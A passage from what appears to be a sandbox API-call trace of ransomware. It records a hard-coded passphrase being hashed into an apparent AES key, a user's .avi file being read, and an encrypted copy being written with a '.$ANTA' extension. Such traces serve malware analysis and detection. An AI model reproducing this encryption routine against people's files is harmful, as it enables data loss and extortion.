cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0104.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cb078, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0104.462] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144de18 | out: phHash=0x144de18) returned 1 [0104.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0104.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2728, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0104.462] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0104.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0104.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2c08, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0104.462] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0104.463] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0104.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0104.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cae38, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0104.463] CryptHashData (hHash=0x41ac040, pbData=0x17e2bd8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0104.463] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0104.463] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0104.463] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0104.464] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0104.464] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cae20, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0104.464] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac040, dwFlags=0x1, phKey=0x144de18 | out: phKey=0x144de18*=0x41ac140) returned 1 [0104.464] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0104.464] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0104.464] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0104.464] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1797108, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0104.464] CryptDestroyHash (hHash=0x41ac040) returned 1 [0104.464] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\--f6foz.avi" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\yyowebt9y9iuoorjx\\--f6foz.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0104.464] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.464] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e550 | out: lpNewFilePointer=0x0) returned 1 [0104.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0104.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0104.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0104.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0104.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0104.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0104.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0104.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0104.465] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0104.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0104.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0104.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0104.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0104.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0104.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0104.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0104.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0104.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0104.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0104.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0104.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0104.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0104.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0104.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0104.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0104.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0104.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0104.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0104.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0104.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0104.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0104.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0104.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc0) returned 0x43eccd8 [0104.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a8580 [0104.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a80e8 [0104.466] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\yyowebt9y9iuoorjx")) returned 0x10 [0104.466] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\--f6foz.avi.$ANTA" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\yyowebt9y9iuoorjx\\--f6foz.avi.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0104.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0104.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0104.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0104.469] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e5a0 | out: lpNewFilePointer=0x0) returned 1 [0104.469] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e5c8, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e5c8*=0xd5f0, lpOverlapped=0x0) returned 1 [0104.470] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e5c8, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e5c8*=0x0, lpOverlapped=0x0) returned 1 [0104.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0104.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0104.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0104.470] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0104.470] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd5f0) returned 0x4516010 [0104.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e04020 | out: hHeap=0x1780000) returned 1 [0104.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0104.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0104.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0104.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0104.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0104.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd5f0) returned 0x4523608 [0104.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0104.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0104.473] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0104.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0104.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0104.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0104.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0104.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0104.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd5f0) returned 0x4516010 [0104.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0104.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0104.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0104.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0104.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0104.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0104.474] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0104.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0104.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0104.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0104.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0104.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0104.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0104.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0104.474] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0104.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0104.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0104.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e00 [0104.474] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0104.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e00 | out: hHeap=0x1780000) returned 1 [0104.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0104.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0104.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2b00 [0104.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0104.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0104.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0104.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0104.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd5f0) returned 0x4516010 [0104.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0104.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a00 [0104.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0104.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0104.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0104.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2960 [0104.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0104.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0104.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0104.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2aa0 [0104.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0104.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0104.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0104.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caaf0 [0104.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0104.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0104.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0104.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0104.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0104.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd5f0) returned 0x4530c00 [0104.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0104.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0104.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0104.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0104.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0104.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0104.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0104.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0104.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0104.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0104.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0104.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0104.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0104.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0104.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0104.476] PeekMessageW (in: lpMsg=0x144e44c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e44c) returned 0 [0104.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0104.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0104.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0104.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0104.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac800 [0104.476] PeekMessageW (in: lpMsg=0x144e44c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e44c) returned 0 [0104.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0104.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0104.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0104.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0104.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0104.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0104.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0104.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0104.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0104.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0104.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0104.476] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0104.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0104.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0104.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0104.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a80 [0104.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0104.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0104.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0104.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0104.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab38 [0104.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0104.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0104.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0104.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0104.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0104.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0104.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0104.477] PeekMessageW (in: lpMsg=0x144df34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144df34) returned 0 [0104.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0104.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0104.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0104.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0104.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0104.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0104.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0104.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0104.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0104.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0104.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0104.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0104.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0104.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0104.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0104.478] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0104.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b48 [0104.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0104.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0104.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0104.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0104.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0104.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bd0 [0104.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0104.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c00 